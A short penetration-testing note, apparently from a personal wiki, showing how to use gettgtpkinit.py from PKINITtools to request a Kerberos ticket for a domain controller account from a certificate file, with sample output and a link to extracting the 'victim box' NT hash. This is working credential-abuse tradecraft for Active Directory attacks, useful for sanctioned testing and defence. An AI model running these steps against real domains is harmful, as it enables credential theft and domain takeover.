# gettgtpkinit.py
Part of [pkinittools](https://github.com/dirkjanm/PKINITtools) which "contains some utilities for playing with PKINIT and certificates."

## Request a TGT using a certificate and private key
```
gettgtpkinit.py -cert-pfx dc.pfx -pfx-pass 123456 domain.com/dc$ dc.ccache
```

Your output will be something like:

```
2025-10-02 14:35:36,055 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-10-02 14:35:36,072 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-10-02 14:35:36,093 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-10-02 14:35:36,093 minikerberos INFO     xxx
INFO:minikerberos:xxx
2025-10-02 14:35:36,096 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file
```

And then you'll have a `zyx.ccache` saved to your current directory, which you can use to [get the NT hash of your victim box](/pentesting/internal/getnthash).